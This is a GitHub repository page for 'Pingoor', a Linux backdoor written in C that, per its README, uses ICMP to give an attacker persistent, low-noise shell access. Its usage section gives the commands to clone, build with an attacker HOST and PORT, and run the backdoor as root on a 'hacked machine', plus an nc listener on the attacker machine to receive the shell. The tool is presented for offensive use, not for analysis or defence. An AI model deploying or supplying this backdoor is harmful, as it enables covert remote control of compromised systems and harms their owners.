Skip to content

peter10012/Pingoor

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

「🚪」About Pingoor

Pingoor is a backdoor developed in C for the GNU/Linux operating system. Its main characteristic is to use the ICMP protocol to give the attacker access to the shell of a machine, making its access persistent with little noise.

How to Use

# Hacked machine
$ git clone https://github.com/MrEmpy/Pingoor.git
$ cd Pingoor
$ HOST=<YOURHOST> PORT=<YOURPORT> make
$ sudo ./pingoor
# Attacker machine
nc -lnvp <YOURPORT>

About

「🚪」Linux Backdoor based on ICMP protocol

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 94.3%
  • Makefile 5.7%